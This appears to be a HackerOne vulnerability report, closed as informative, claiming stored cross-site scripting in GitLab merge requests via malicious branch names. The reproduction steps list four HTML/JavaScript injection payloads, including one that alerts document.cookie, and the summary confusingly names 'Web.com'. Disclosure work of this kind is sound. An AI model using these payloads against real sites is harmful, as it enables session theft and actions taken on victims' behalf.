Stored-XSS in merge requests
None
Vulnerability Details
Summary
As an attacker I could do XSS on Web.com because it is vulnerable Stored XSS, also known as persistent XSS, is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.
### Steps to reproduce
1. Go to https://gitlab.com/
2. Create a new branch with name any of these
<form><button formaction=javascript:alert(1)>CLICKME
"><img src=x onerror=alert(document.domain)>
<iframe <><a href=javascript:alert(document.cookie)>Click Here</a>=></iframe>
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
3. Create a new merge request from the new branch to master
4. XSS is saved and if you will open the readme file and add these payloads to it it will also save these payloads
### Output of checks
This bug happens on GitLab.com
## Impact
This stored-XSS allows attacker to execute arbitrary actions on behalf of victim notably via gitlab API. The attacker can steal data from whoever checks the report.
Actions
View on HackerOneReport Stats
- Report ID: 1261148
- State: Closed
- Substate: informative
- Upvotes: 6